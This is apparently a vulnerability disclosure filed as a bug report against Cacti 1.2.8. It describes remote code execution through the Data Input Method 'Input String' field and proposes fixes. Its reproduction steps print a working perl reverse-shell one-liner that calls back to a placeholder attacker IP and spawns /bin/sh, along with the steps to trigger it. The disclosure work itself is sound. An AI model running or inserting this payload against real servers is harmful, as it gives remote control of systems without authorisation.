Description
Describe the bug
Input validation error in data_input.php leads to Remote Code Execution via Input String (Script/Command) edit actions. By default, Cacti was installed with several Data Input Methods. Some of them was created using Script/Command input type. An attacker will be able to edit the Input String to insert malicious code and take control of the server.
Cacti version: Latest (1.2.8)
To Reproduce
Steps to reproduce the behavior:
- After logged in, navigate to Data Collection -> Data Input Methods -> Unix - Ping Host
- By default, Input String was specified as:
perl <path_cacti>/scripts/ping.pl <hostname>. Let's append a malicious perl script in front of current script:
perl -e 'use Socket;$i="**ACTTACKER-IP**";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; perl <path_cacti>/scripts/ping.pl <hostname>
- By default, Unix -Ping Host data input method is being used by Unix - Ping Latency Graph template. This means we can create Unix - Ping Latency in current device and gain Remote Code Execution
Expected behavior
- By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended into the Input String, the server will make a call back to Attacker's machine first.
Impact
- The vulnerability would let an authorized user take control of the server. Attack will then be able to take down the system as well as use the system for malicious purposes.
Screenshots
If applicable, add screenshots to help explain your problem.
- Malicious code: https://imgur.com/icaFTHk
- Create new graph in device: https://imgur.com/C8zF3Py
- Reverse shell connection: https://imgur.com/97HgO0g
Desktop (please complete the following information):
- OS: Kali Linux, Ubuntu
- Browser : Firefox, Chrome
- Version: Firefox 72.0, Chrome 79.0.3945.117
Remediation
- I would think about two (2) solutions:
1 - Using regex to catch all other strings different from expected string
2 - Hard-coding perl script into source-code and force the application to take only 1 filtered input (hostname).
Chi Tran
research@ctrsec.io